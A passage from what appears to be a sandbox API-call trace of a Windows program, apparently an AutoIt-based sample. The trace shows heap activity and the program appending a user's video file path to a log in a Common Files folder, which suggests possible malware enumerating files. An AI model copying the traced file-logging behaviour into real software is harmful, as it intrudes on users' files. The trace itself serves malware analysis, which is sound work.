lpMsg=0x87f36c) returned 0 [0198.748] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.748] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0198.748] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.749] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.749] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.749] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.749] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.749] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.750] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.751] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.751] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3d0a, lpOverlapped=0x0) returned 1 [0198.751] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.751] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3d0a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.751] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0198.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv\r\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0198.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0198.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv\r\n", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv\r\n", lpUsedDefaultChar=0x0) returned 67 [0198.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0198.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0198.752] WriteFile (in: hFile=0x158, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x42, lpOverlapped=0x0) returned 1 [0198.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.752] CloseHandle (hObject=0x158) returned 1 [0198.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.754] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.754] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.755] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.755] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.755] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.755] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.756] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0198.759] 